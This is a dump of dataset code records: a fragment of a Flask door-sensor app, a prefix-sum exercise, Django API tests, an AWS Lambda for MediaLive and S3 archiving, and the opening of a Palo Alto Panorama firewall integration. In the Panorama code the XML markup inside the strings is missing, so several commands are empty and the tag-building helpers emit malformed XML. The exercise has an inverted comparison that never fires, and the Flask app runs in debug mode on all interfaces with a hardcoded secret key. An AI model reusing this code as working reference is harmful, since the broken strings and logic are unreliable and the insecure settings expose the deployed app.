door_sensor.value == 1:\n # session[\"status_door\"] = \"closed\"\n # else:\n # session[\"status_door\"] = \"open\"\n\n # status wurde noch nicht gesetzt aus irgend einem grund\n if str(session.get('status_session')) == \"None\":\n set_state0()\n return(\"status is not set. set state0\")\n\n # wenn state=state1 und status_door = \"open\", setze state2\n elif str(session.get('status_session')) == \"state1\" and session[\"status_door\"] == \"open\":\n set_state2()\n\n # wenn state=state2 und status_door = \"closed\", setze state3\n elif str(session.get('status_session')) == \"state2\" and session[\"status_door\"] == \"closed\":\n set_state3()\n\n # return render_template('index.html', magnet_state=session[\"status_magnet\"], door_state_text=session[\"status_door\"])\n return (\"status is set: \" + str(session.get('status_session')))\n\n\n#start the web server at localhost on port 80\nif __name__ == '__main__':\n app.secret_key = \"super secret fridge key\"\n app.run(host='0.0.0.0', port=1338, debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"258543021","text":"n,t=map(int,input().split())\na=list(map(int,input().split()))\nprint(n,t,a)\ntmp=0\nsumm=[0 for i in range(0,n+1)]\nsumm[0]=0\nfor i in range(1,n+1):\n summ[i]=summ[i-1]+a[i-1]\nmaxn=0\nfor i in range(1,n+1):\n for j in range(0,i):\n if (summ[i]-summ[j]<=t) and (j-i>maxn):\n maxn=j-i\nprint(maxn)","sub_path":"Code/CodeRecords/2844/60670/269454.py","file_name":"269454.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"212452910","text":"from django.urls import reverse\nfrom rest_framework import status\n\nfrom shiptrader.models import Starship, Listing\n\n\ndef test_get_starships(api_client, test_data):\n response = api_client.get(reverse('starship-list'))\n\n assert response.status_code == status.HTTP_200_OK\n assert len(response.data) == 6\n\n\ndef test_get_listings(api_client, test_data):\n \"\"\"All active Listings should be shown.\n \"\"\"\n response = api_client.get(reverse('listing-list'))\n\n assert response.status_code == status.HTTP_200_OK\n assert len(response.data) == 5\n\n\ndef test_get_listing_detail(api_client, test_data):\n listing = Listing.objects.first()\n response = api_client.get(reverse('listing-detail', args=[listing.id]))\n\n assert response.status_code == status.HTTP_200_OK\n\n\ndef test_get_listings_by_starship_class(\n api_client, test_data, starship_factory, listing_factory):\n \"\"\"Django-Filter backend should filter by related starship_class field.\n \"\"\"\n new_ship = starship_factory(starship_class='Another Class')\n listing_factory(ship_type=new_ship)\n response = api_client.get(\n reverse('listing-list'), {'ship_type__starship_class': 'Another Class'})\n\n assert response.status_code == status.HTTP_200_OK\n assert len(response.data) == 1\n\n\ndef test_get_listings_ordered_by_price(api_client, test_data, listing_factory):\n listing_factory(price=100)\n response = api_client.get(reverse('listing-list'), {'ordering': 'price'})\n\n assert response.status_code == status.HTTP_200_OK\n listings = response.data\n assert len(listings) == 6\n assert listings[0]['price'] == 100\n\n\ndef test_get_listings_ordered_by_price_descending(api_client, test_data, listing_factory):\n listing_factory(price=100)\n response = api_client.get(reverse('listing-list'), {'ordering': '-price'})\n\n assert response.status_code == status.HTTP_200_OK\n listings = response.data\n assert len(listings) == 6\n assert listings[5]['price'] == 100\n\n\ndef test_get_listings_ordered_by_modified(api_client, test_data, listing_factory):\n listing = listing_factory(name='New listing')\n response = api_client.get(reverse('listing-list'), {'ordering': 'modified'})\n\n assert response.status_code == status.HTTP_200_OK\n listings = response.data\n assert len(listings) == 6\n assert listings[5]['name'] == listing.name\n\n\ndef test_get_listings_ordered_by_modified_descending(api_client, test_data, listing_factory):\n listing = listing_factory(name='New listing')\n response = api_client.get(reverse('listing-list'), {'ordering': '-modified'})\n\n assert response.status_code == status.HTTP_200_OK\n listings = response.data\n assert len(listings) == 6\n assert listings[0]['name'] == listing.name\n\n\ndef test_create_listing(api_client, test_data):\n ship = Starship.objects.first()\n response = api_client.post(\n reverse('listing-list'),\n {\n 'name': 'New listing',\n 'ship_name': ship.name,\n 'price': 666,\n },\n format='json'\n )\n\n assert response.status_code == status.HTTP_201_CREATED\n assert response.data['name'] == 'New listing'\n assert response.data['ship_type'] == ship.id\n assert response.data['price'] == 666\n\n\ndef test_put_listing_deactivate(api_client, test_data):\n listing = Listing.objects.filter(is_active=True).first()\n response = api_client.patch(\n reverse('listing-detail', args=[listing.id]), {'is_active': False})\n\n assert response.status_code == status.HTTP_200_OK\n assert not response.data['is_active']\n listing = Listing.objects.get(id=listing.id)\n assert not listing.is_active\n\n\ndef test_put_listing_activate(api_client, test_data):\n listing = Listing.objects.filter(is_active=False).first()\n response = api_client.patch(\n reverse('listing-detail', args=[listing.id]), {'is_active': True})\n\n assert response.status_code == status.HTTP_200_OK\n assert response.data['is_active']\n listing = Listing.objects.get(id=listing.id)\n assert listing.is_active\n","sub_path":"shiptrader/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":4045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"41800304","text":"# CloudWatch Channel State Change Event idle -> Running\n# 1. Update Channel State on DDB\n# 2. Update VoD table\n# 3. Notify Mobile Channel Ready\n\n# CloudWatch Channel State Change Event Running -> Idle\n# 1. Update Channel State on DDB\n# 2. Start moving archive file to new location\n# 3. Create .m3u8 file from list of .ts file\n# 4. Add new .m3u8 to DDB for future playing\n# 5. Update VoD table\n\nimport boto3\nimport json\nimport os\nimport uuid\nfrom datetime import datetime\n\n# BOTO3\nmedialive = boto3.client('medialive')\ndynamodb = boto3.resource(\"dynamodb\")\nsns = boto3.client('sns')\ns3 = boto3.resource('s3')\n\nddb_channel = dynamodb.Table(os.environ['ddb_channel'])\nddb_vod = dynamodb.Table(os.environ['ddb_vod'])\narchive_s3 = os.environ['archive_s3']\nvod_s3key = os.environ['vod_s3key']\nCloudFrontVoDURL = os.environ['CloudFrontVoDURL']\n\ndef lambda_handler(event, context):\n # CloudWatch Channel State Change Event idle -> Running\n # 1. Update Channel State on DDB\n # 2. Update VoD table\n # 3. Notify Mobile Channel Ready\n if event['detail']['state'] == 'RUNNING' :\n ChannelId = getChannelId(event['detail']['channel_arn'])\n print(f'updating channel {ChannelId} State to RUNNING')\n\n VoDID = str(uuid.uuid4())\n\n ddb_channel.update_item(\n Key={\n 'ChannelId': ChannelId\n },\n UpdateExpression='set #keyState = :State, VoDID = :VoDID',\n ExpressionAttributeNames={\n '#keyState' : 'State',\n },\n ExpressionAttributeValues={\n ':State': 'RUNNING',\n ':VoDID': VoDID\n }\n )\n\n timestamp = datetime.timestamp(datetime.now())\n print(\"start timestamp =\", timestamp)\n\n VoD = {\n 'VoDID' : VoDID,\n 'ChannelId' : ChannelId,\n 'StartTime' : str(timestamp),\n 'EndTime' : None,\n 'VoDEndpoint' : None,\n 'Streamer' : None\n }\n ddb_vod.put_item(Item=VoD)\n\n Channel = ddb_channel.get_item(\n Key={ 'ChannelId': ChannelId }\n )\n ChannelRTMPEndpoint = Channel['Item']['RTMPEndpoint']\n Message = {\n 'Message' : f'Channel {ChannelId} is ready',\n 'RTMPEndpoint' : ChannelRTMPEndpoint\n }\n print(Message)\n sns_publish = sns.publish(\n TopicArn=os.environ['snstopic'],\n Message=json.dumps(Message),\n MessageStructure='string',\n )\n return 'ok'\n\n\n # CloudWatch Channel State Change Event Running -> Idle\n # 1. Start moving archive file to new location\n # 2. Create .m3u8 file from list of .ts file\n # 3. Add new .m3u8 to DDB for future playing\n # 4. Update VoD table\n # 5. Update Channel State on DDB ✅\n elif event['detail']['state'] == 'STOPPED' :\n ChannelId = getChannelId(event['detail']['channel_arn'])\n\n Channel = ddb_channel.get_item(\n Key={ 'ChannelId': ChannelId }\n )\n\n # 1. Start moving archive file to new location\n origins3key = Channel['Item']['VoDS3key']\n VoDID = Channel['Item']['VoDID']\n for obj in s3.Bucket(archive_s3).objects.filter(Prefix=origins3key):\n # Copy object A as object B\n filename = getFilename(obj.key)\n print(f'src: {obj.key}')\n print(f'destination: {vod_s3key}/{VoDID}/{filename}')\n copy_source = {\n 'Bucket': archive_s3,\n 'Key': obj.key\n }\n destbucket = s3.Bucket(archive_s3)\n obj = destbucket.Object(f'{vod_s3key}/{VoDID}/{filename}')\n obj.copy(copy_source)\n\n for obj in s3.Bucket(archive_s3).objects.filter(Prefix=origins3key):\n s3.Object(archive_s3, obj.key).delete()\n print(f'deleted {obj.key}')\n\n # 2. Create .m3u8 file from list of .ts file\n # 3. Add new .m3u8 to DDB for future playing\n # 4. Update VoD table\n timestamp = datetime.timestamp(datetime.now())\n print(\"end timestamp =\", timestamp)\n VoDEndpoint = f'https://{CloudFrontVoDURL}/{vod_s3key}/{VoDID}/index.m3u8'\n ddb_vod.update_item(\n Key={\n 'VoDID': VoDID\n },\n UpdateExpression='set EndTime = :EndTime, VoDEndpoint = :VoDEndpoint',\n ExpressionAttributeValues={\n ':EndTime': str(timestamp),\n ':VoDEndpoint' : VoDEndpoint\n }\n )\n\n # 5. Update Channel State on DDB ✅\n print(f'updating channel {ChannelId} State to STOPPED')\n ddb_channel.update_item(\n Key={\n 'ChannelId': ChannelId\n },\n UpdateExpression='set #keyState = :State, VoDID = :VoDID',\n ExpressionAttributeNames={\n '#keyState' : 'State',\n },\n ExpressionAttributeValues={\n ':State': 'IDLE',\n ':VoDID': None\n }\n )\n\n return 'ok'\n\n\n return 'ok'\n\ndef getChannelId (ChannelARN) :\n return ChannelARN.rsplit(':',1)[1]\n\n\ndef getFilename (s3key) :\n return s3key.rsplit('/',1)[1]","sub_path":"lambda/event/onChannelStateChange/onChannelStateChange.py","file_name":"onChannelStateChange.py","file_ext":"py","file_size_in_byte":5177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"173172968","text":"import shutil\n\nfrom CommonServerPython import *\n\n''' IMPORTS '''\nfrom datetime import datetime\nfrom typing import Dict, List, Any, Optional, Tuple, Union\nimport uuid\nimport json\nimport requests\n\n# disable insecure warnings\nrequests.packages.urllib3.disable_warnings()\n\n''' GLOBALS '''\nURL = ''\nAPI_KEY = None\nUSE_SSL = None\nUSE_URL_FILTERING = None\nTEMPLATE = None\nVSYS = ''\nPRE_POST = ''\n\nXPATH_SECURITY_RULES = ''\nDEVICE_GROUP = ''\n\nXPATH_OBJECTS = ''\n\nXPATH_RULEBASE = ''\n\n# Security rule arguments for output handling\nSECURITY_RULE_ARGS = {\n 'rulename': 'Name',\n 'source': 'Source',\n 'destination': 'Destination',\n 'negate_source': 'NegateSource',\n 'negate_destination': 'NegateDestination',\n 'action': 'Action',\n 'service': 'Service',\n 'disable': 'Disabled',\n 'application': 'Application',\n 'source_user': 'SourceUser',\n 'disable_server_response_inspection': 'DisableServerResponseInspection',\n 'description': 'Description',\n 'target': 'Target',\n 'log_forwarding': 'LogForwarding',\n 'log-setting': 'LogForwarding',\n 'tag': 'Tags',\n 'profile-setting': 'ProfileSetting',\n}\n\nPAN_OS_ERROR_DICT = {\n '1': 'Unknown command - The specific config or operational command is not recognized.',\n '2': 'Internal errors - Check with technical support when seeing these errors.',\n '3': 'Internal errors - Check with technical support when seeing these errors.',\n '4': 'Internal errors - Check with technical support when seeing these errors.',\n '5': 'Internal errors - Check with technical support when seeing these errors.',\n '6': 'Bad Xpath -The xpath specified in one or more attributes of the command is invalid.'\n 'Check the API browser for proper xpath values.',\n '7': 'Object not present - Object specified by the xpath is not present. For example,'\n 'entry[@name=value] where no object with name value is present.',\n '8': 'Object not unique - For commands that operate on a single object, the specified object is not unique.',\n '10': 'Reference count not zero - Object cannot be deleted as there are other objects that refer to it.'\n 'For example, address object still in use in policy.',\n '11': 'Internal error - Check with technical support when seeing these errors.',\n '12': 'Invalid object - Xpath or element values provided are not complete.',\n '14': 'Operation not possible - Operation is allowed but not possible in this case.'\n 'For example, moving a rule up one position when it is already at the top.',\n '15': 'Operation denied - Operation is allowed. For example, Admin not allowed to delete own account,'\n 'Running a command that is not allowed on a passive device.',\n '16': 'Unauthorized -The API role does not have access rights to run this query.',\n '17': 'Invalid command -Invalid command or parameters.',\n '18': 'Malformed command - The XML is malformed.',\n # 19,20: success\n '21': 'Internal error - Check with technical support when seeing these errors.',\n '22': 'Session timed out - The session for this query timed out.'\n}\n\n\nclass PAN_OS_Not_Found(Exception):\n \"\"\" PAN-OS Error. \"\"\"\n\n def __init__(self, *args): # real signature unknown\n pass\n\n\ndef http_request(uri: str, method: str, headers: dict = {},\n body: dict = {}, params: dict = {}, files: dict = None, is_pcap: bool = False) -> Any:\n \"\"\"\n Makes an API call with the given arguments\n \"\"\"\n result = requests.request(\n method,\n uri,\n headers=headers,\n data=body,\n verify=USE_SSL,\n params=params,\n files=files\n )\n\n if result.status_code < 200 or result.status_code >= 300:\n raise Exception(\n 'Request Failed. with status: ' + str(result.status_code) + '. Reason is: ' + str(result.reason))\n\n # if pcap download\n if is_pcap:\n return result\n\n json_result = json.loads(xml2json(result.text))\n\n # handle raw response that does not contain the response key, e.g configuration export\n if ('response' not in json_result or '@code' not in json_result['response']) and \\\n not json_result['response']['@status'] != 'success':\n return json_result\n\n # handle non success\n if json_result['response']['@status'] != 'success':\n if 'msg' in json_result['response'] and 'line' in json_result['response']['msg']:\n # catch non existing object error and display a meaningful message\n if json_result['response']['msg']['line'] == 'No such node':\n raise Exception(\n 'Object was not found, verify that the name is correct and that the instance was committed.')\n\n # catch urlfiltering error and display a meaningful message\n elif str(json_result['response']['msg']['line']).find('test -> url') != -1:\n if DEVICE_GROUP:\n raise Exception('URL filtering commands are only available on Firewall devices.')\n raise Exception('The URL filtering license is either expired or not active.'\n ' Please contact your PAN-OS representative.')\n\n # catch non valid jobID errors and display a meaningful message\n elif isinstance(json_result['response']['msg']['line'], str) and \\\n json_result['response']['msg']['line'].find('job') != -1 and \\\n (json_result['response']['msg']['line'].find('not found') != -1\n or json_result['response']['msg']['line'].find('No such query job')) != -1:\n raise Exception('Invalid Job ID error: ' + json_result['response']['msg']['line'])\n\n # catch already at the top/bottom error for rules and return this as an entry.note\n elif str(json_result['response']['msg']['line']).find('already at the') != -1:\n return_results('Rule ' + str(json_result['response']['msg']['line']))\n sys.exit(0)\n\n # catch already registered ip tags and return this as an entry.note\n elif str(json_result['response']['msg']['line']).find('already exists, ignore') != -1:\n if isinstance(json_result['response']['msg']['line']['uid-response']['payload']['register']['entry'],\n list):\n ips = [o['@ip'] for o in\n json_result['response']['msg']['line']['uid-response']['payload']['register']['entry']]\n else:\n ips = json_result['response']['msg']['line']['uid-response']['payload']['register']['entry']['@ip']\n return_results(\n 'IP ' + str(ips) + ' already exist in the tag. All submitted IPs were not registered to the tag.')\n sys.exit(0)\n\n # catch timed out log queries and return this as an entry.note\n elif str(json_result['response']['msg']['line']).find('Query timed out') != -1:\n return_results(str(json_result['response']['msg']['line']) + '. Rerun the query.')\n sys.exit(0)\n\n if '@code' in json_result['response']:\n raise Exception(\n 'Request Failed.\\nStatus code: ' + str(json_result['response']['@code']) + '\\nWith message: ' + str(\n json_result['response']['msg']['line']))\n else:\n raise Exception('Request Failed.\\n' + str(json_result['response']))\n\n # handle @code\n if json_result['response']['@code'] in PAN_OS_ERROR_DICT:\n error_message = 'Request Failed.\\n' + PAN_OS_ERROR_DICT[json_result['response']['@code']]\n if json_result['response']['@code'] == '7' and DEVICE_GROUP:\n device_group_names = get_device_groups_names()\n if DEVICE_GROUP not in device_group_names:\n error_message += (f'\\nDevice Group: {DEVICE_GROUP} does not exist.'\n f' The available Device Groups for this instance:'\n f' {\", \".join(device_group_names)}.')\n raise PAN_OS_Not_Found(error_message)\n return_warning('List not found and might be empty', True)\n if json_result['response']['@code'] not in ['19', '20']:\n # error code non exist in dict and not of success\n if 'msg' in json_result['response']:\n raise Exception(\n 'Request Failed.\\nStatus code: ' + str(json_result['response']['@code']) + '\\nWith message: ' + str(\n json_result['response']['msg']))\n else:\n raise Exception('Request Failed.\\n' + str(json_result['response']))\n\n return json_result\n\n\ndef add_argument_list(arg: Any, field_name: str, member: Optional[bool], any_: Optional[bool] = False) -> str:\n member_stringify_list = ''\n if arg:\n if isinstance(arg, str):\n arg = [arg]\n\n for item in arg:\n member_stringify_list += '' + item + ''\n if field_name == 'member':\n return member_stringify_list\n elif member:\n return '<' + field_name + '>' + member_stringify_list + ''\n else:\n return '<' + field_name + '>' + arg + ''\n if any_:\n if member:\n return '<' + field_name + '>any'\n else:\n return '<' + field_name + '>any'\n else:\n return ''\n\n\ndef add_argument(arg: Optional[str], field_name: str, member: bool) -> str:\n if arg:\n if member:\n return '<' + field_name + '>' + arg + ''\n else:\n return '<' + field_name + '>' + arg + ''\n else:\n return ''\n\n\ndef add_argument_open(arg: Optional[str], field_name: str, member: bool) -> str:\n if arg:\n if member:\n return '<' + field_name + '>' + arg + ''\n else:\n return '<' + field_name + '>' + arg + ''\n else:\n if member:\n return '<' + field_name + '>any'\n else:\n return '<' + field_name + '>any'\n\n\ndef add_argument_yes_no(arg: Optional[str], field_name: str, option: bool = False) -> str:\n if arg and arg == 'No':\n result = '<' + field_name + '>' + 'no' + ''\n else:\n result = '<' + field_name + '>' + ('yes' if arg else 'no') + ''\n\n if option:\n result = ''\n\n return result\n\n\ndef add_argument_target(arg: Optional[str], field_name: str) -> str:\n if arg:\n return '<' + field_name + '>' + '' + '' + '' + ''\n else:\n return ''\n\n\ndef add_argument_profile_setting(arg: Optional[str], field_name: str) -> str:\n if not arg:\n return ''\n member_stringify_list = '' + arg + ''\n return '<' + field_name + '>' + '' + member_stringify_list + '' + ''\n\n\ndef set_xpath_network(template: str = None) -> Tuple[str, Optional[str]]:\n \"\"\"\n Setting template xpath relevant to panorama instances.\n \"\"\"\n if template:\n if not DEVICE_GROUP or VSYS:\n raise Exception('Template is only relevant for Panorama instances.')\n if not template:\n template = TEMPLATE\n # setting network xpath relevant to FW or panorama management\n if DEVICE_GROUP:\n xpath_network = f'/config/devices/entry[@name=\\'localhost.localdomain\\']/template/entry[@name=\\'{template}\\']' \\\n f'/config/devices/entry[@name=\\'localhost.localdomain\\']/network'\n else:\n xpath_network = \"/config/devices/entry[@name='localhost.localdomain']/network\"\n return xpath_network, template\n\n\ndef prepare_security_rule_params(api_action: str = None, rulename: str = None, source: Any = None,\n destination: Any = None, negate_source: str = None,\n negate_destination: str = None, action: str = None, service: List[str] = None,\n disable: str = None, application: List[str] = None, source_user: str = None,\n category: List[str] = None, from_: str = None, to: str = None, description: str = None,\n target: str = None, log_forwarding: str = None,\n disable_server_response_inspection: str = None, tags: List[str] = None,\n profile_setting: str = None) -> Dict:\n if application is None or len(application) == 0:\n # application always must be specified and the default should be any\n application = ['any']\n\n # flake8: noqa\n rulename = rulename if rulename else ('demisto-' + (str(uuid.uuid4()))[:8])\n params = {\n 'type': 'config',\n 'action': api_action,\n 'key': API_KEY,\n 'element': add_argument_open(action, 'action', False)\n + add_argument_target(target, 'target')\n + add_argument_open(description, 'description', False)\n + add_argument_list(source, 'source', True, True)\n + add_argument_list(destination, 'destination', True, True)\n + add_argument_list(application, 'application', True)\n + add_argument_list(category, 'category', True)\n + add_argument_open(source_user, 'source-user', True)\n + add_argument_list(from_, 'from', True, True) # default from will always be any\n + add_argument_list(to, 'to', True, True) # default to will always be any\n + add_argument_list(service, 'service', True, True)\n + add_argument_yes_no(negate_source, 'negate-source')\n + add_argument_yes_no(negate_destination, 'negate-destination')\n + add_argument_yes_no(disable, 'disabled')\n + add_argument_yes_no(disable_server_response_inspection, 'disable-server-response-inspection', True)\n + add_argument(log_forwarding, 'log-setting', False)\n + add_argument_list(tags, 'tag', True)\n + add_argument_profile_setting(profile_setting, 'profile-setting')\n }\n if DEVICE_GROUP:\n if not PRE_POST:\n raise Exception('Please provide the pre_post argument when configuring'\n ' a security rule in Panorama instance.')\n else:\n params['xpath'] = XPATH_SECURITY_RULES + PRE_POST + '/security/rules/entry' + '[@name=\\'' + rulename + '\\']'\n else:\n params['xpath'] = XPATH_SECURITY_RULES + '[@name=\\'' + rulename + '\\']'\n return params\n\n\ndef get_pan_os_version() -> str:\n \"\"\"Retrieves pan-os version\n\n Returns:\n String representation of the version\n \"\"\"\n params = {\n 'type': 'version',\n 'key': API_KEY\n }\n result = http_request(URL, 'GET', params=params)\n version = result['response']['result']['sw-version']\n return version\n\n\ndef get_pan_os_major_version() -> int:\n \"\"\"Retrieves pan-os major version\n\n Returns:\n String representation of the major version\n \"\"\"\n major_version = int(get_pan_os_version().split('.')[0])\n return major_version\n\n\n''' FUNCTIONS'''\n\n\ndef panorama_test():\n \"\"\"\n test module\n \"\"\"\n params = {\n 'type': 'op',\n 'cmd': '',\n 'key': API_KEY\n }\n\n http_request(\n URL,\n 'GET',\n params=params\n )\n\n if DEVICE_GROUP and DEVICE_GROUP != 'shared':\n device_group_test()\n\n _, template = set_xpath_network()\n if template:\n template_test(template)\n\n return_results('ok')\n\n\ndef get_device_groups_names():\n \"\"\"\n Get device group names in the Panorama\n \"\"\"\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': \"/config/devices/entry/device-group/entry\",\n 'key': API_KEY\n }\n\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n\n device_groups = result['response']['result']['entry']\n device_group_names = []\n if isinstance(device_groups, dict):\n # only one device group in the panorama\n device_group_names.append(device_groups.get('@name'))\n else:\n for device_group in device_groups:\n device_group_names.append(device_group.get('@name'))\n\n return device_group_names\n\n\ndef device_group_test():\n \"\"\"\n Test module for the Device group specified\n \"\"\"\n device_group_names = get_device_groups_names()\n if DEVICE_GROUP not in device_group_names:\n raise Exception(f'Device Group: {DEVICE_GROUP} does not exist.'\n f' The available Device Groups for this instance: {\", \".join(device_group_names)}.')\n\n\ndef get_templates_names():\n \"\"\"\n Get templates names in the Panorama\n \"\"\"\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': \"/config/devices/entry[@name=\\'localhost.localdomain\\']/template/entry\",\n 'key': API_KEY\n }\n\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n\n templates = result['response']['result']['entry']\n template_names = []\n if isinstance(templates, dict):\n # only one device group in the panorama\n template_names.append(templates.get('@name'))\n else:\n for template in templates:\n template_names.append(template.get('@name'))\n\n return template_names\n\n\ndef template_test(template: str):\n \"\"\"\n Test module for the Template specified\n \"\"\"\n template_names = get_templates_names()\n if template not in template_names:\n raise Exception(f'Template: {template} does not exist.'\n f' The available Templates for this instance: {\", \".join(template_names)}.')\n\n\n@logger\ndef panorama_command(args: dict):\n \"\"\"\n Executes a command\n \"\"\"\n params = {}\n for arg in args.keys():\n params[arg] = args[arg]\n params['key'] = API_KEY\n\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Command was executed successfully.',\n })\n\n\n@logger\ndef panorama_commit():\n params = {\n 'type': 'commit',\n 'cmd': '',\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n\n return result\n\n\ndef panorama_commit_command():\n \"\"\"\n Commit and show message in warroom\n \"\"\"\n result = panorama_commit()\n\n if 'result' in result['response']:\n # commit has been given a jobid\n commit_output = {\n 'JobID': result['response']['result']['job'],\n 'Status': 'Pending'\n }\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Commit:', commit_output, ['JobID', 'Status'], removeNull=True),\n 'EntryContext': {\n \"Panorama.Commit(val.JobID == obj.JobID)\": commit_output\n }\n })\n else:\n # no changes to commit\n return_results(result['response']['msg'])\n\n\n@logger\ndef panorama_commit_status(args: dict):\n params = {\n 'type': 'op',\n 'cmd': '' + args['job_id'] + '',\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n\n return result\n\n\ndef panorama_commit_status_command(args: dict):\n \"\"\"\n Check jobID of commit status\n \"\"\"\n result = panorama_commit_status(args)\n\n if result['response']['result']['job']['type'] != 'Commit':\n raise Exception('JobID given is not of a commit.')\n\n commit_status_output = {'JobID': result['response']['result']['job']['id']}\n if result['response']['result']['job']['status'] == 'FIN':\n if result['response']['result']['job']['result'] == 'OK':\n commit_status_output['Status'] = 'Completed'\n else:\n # result['response']['job']['result'] == 'FAIL'\n commit_status_output['Status'] = 'Failed'\n commit_status_output['Details'] = result['response']['result']['job']['details']['line']\n\n if result['response']['result']['job']['status'] == 'ACT':\n if result['response']['result']['job']['result'] == 'PEND':\n commit_status_output['Status'] = 'Pending'\n\n # WARNINGS - Job warnings\n status_warnings = []\n if result.get(\"response\", {}).get('result', {}).get('job', {}).get('warnings', {}):\n status_warnings = result.get(\"response\", {}).get('result', {}).get('job', {}).get('warnings', {}).get('line',\n [])\n ignored_error = 'configured with no certificate profile'\n commit_status_output[\"Warnings\"] = [item for item in status_warnings if item not in ignored_error]\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Commit status:', commit_status_output,\n ['JobID', 'Status', 'Details', 'Warnings'],\n removeNull=True),\n 'EntryContext': {\"Panorama.Commit(val.JobID == obj.JobID)\": commit_status_output}\n })\n\n\n@logger\ndef panorama_push_to_device_group():\n params = {\n 'type': 'commit',\n 'action': 'all',\n 'cmd': '',\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n\n return result\n\n\ndef panorama_push_to_device_group_command():\n \"\"\"\n Push Panorama configuration and show message in warroom\n \"\"\"\n if not DEVICE_GROUP:\n raise Exception(\"The 'panorama-push-to-device-group' command is relevant for a Palo Alto Panorama instance.\")\n\n result = panorama_push_to_device_group()\n if 'result' in result['response']:\n # commit has been given a jobid\n push_output = {\n 'DeviceGroup': DEVICE_GROUP,\n 'JobID': result['response']['result']['job'],\n 'Status': 'Pending'\n }\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Push to Device Group:', push_output, ['JobID', 'Status'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.Push(val.JobID == obj.JobID)\": push_output\n }\n })\n else:\n # no changes to commit\n return_results(result['response']['msg']['line'])\n\n\n@logger\ndef panorama_push_status(job_id: str):\n params = {\n 'type': 'op',\n 'cmd': '' + job_id + '',\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n\n return result\n\n\ndef safeget(dct: dict, keys: List[str]):\n # Safe get from dictionary\n for key in keys:\n try:\n if isinstance(dct, dict):\n dct = dct[key]\n else:\n return None\n except KeyError:\n return None\n return dct\n\n\ndef panorama_push_status_command(job_id: str):\n \"\"\"\n Check jobID of push status\n \"\"\"\n result = panorama_push_status(job_id)\n job = result.get('response', {}).get('result', {}).get('job', {})\n if job.get('type', '') != 'CommitAll':\n raise Exception('JobID given is not of a Push.')\n\n push_status_output = {'JobID': job.get('id')}\n if job.get('status', '') == 'FIN':\n if job.get('result', '') == 'OK':\n push_status_output['Status'] = 'Completed'\n else:\n push_status_output['Status'] = 'Failed'\n\n devices = job.get('devices')\n devices = devices.get('entry') if devices else devices\n if isinstance(devices, list):\n devices_details = [device.get('status') for device in devices if device]\n push_status_output['Details'] = devices_details\n elif isinstance(devices, dict):\n push_status_output['Details'] = devices.get('status')\n\n if job.get('status') == 'PEND':\n push_status_output['Status'] = 'Pending'\n\n # WARNINGS - Job warnings\n status_warnings = [] # type: ignore\n devices = safeget(result, [\"response\", \"result\", \"job\", \"devices\", \"entry\"])\n if devices:\n for device in devices:\n device_warnings = safeget(device, [\"details\", \"msg\", \"warnings\", \"line\"])\n status_warnings.extend([] if not device_warnings else device_warnings)\n push_status_output[\"Warnings\"] = status_warnings\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Push to Device Group status:', push_status_output,\n ['JobID', 'Status', 'Details', 'Warnings'], removeNull=True),\n 'EntryContext': {\"Panorama.Push(val.JobID == obj.JobID)\": push_status_output}\n })\n\n\n''' Addresses Commands '''\n\n\ndef prettify_addresses_arr(addresses_arr: list) -> List:\n if not isinstance(addresses_arr, list):\n return prettify_address(addresses_arr)\n pretty_addresses_arr = []\n for address in addresses_arr:\n pretty_address = {'Name': address['@name']}\n if DEVICE_GROUP:\n pretty_address['DeviceGroup'] = DEVICE_GROUP\n if 'description' in address:\n pretty_address['Description'] = address['description']\n\n if 'ip-netmask' in address:\n pretty_address['IP_Netmask'] = address['ip-netmask']\n\n if 'ip-range' in address:\n pretty_address['IP_Range'] = address['ip-range']\n\n if 'fqdn' in address:\n pretty_address['FQDN'] = address['fqdn']\n\n if 'tag' in address and 'member' in address['tag']:\n pretty_address['Tags'] = address['tag']['member']\n\n pretty_addresses_arr.append(pretty_address)\n\n return pretty_addresses_arr\n\n\n@logger\ndef panorama_list_addresses(tag: Optional[str] = None):\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"address/entry\",\n 'key': API_KEY\n }\n\n if tag:\n params['xpath'] = f'{params[\"xpath\"]}[( tag/member = \\'{tag}\\')]'\n\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_list_addresses_command(args: dict):\n \"\"\"\n Get all addresses\n \"\"\"\n addresses_arr = panorama_list_addresses(args.get('tag'))\n addresses_output = prettify_addresses_arr(addresses_arr)\n\n return_results({\n 'Type': 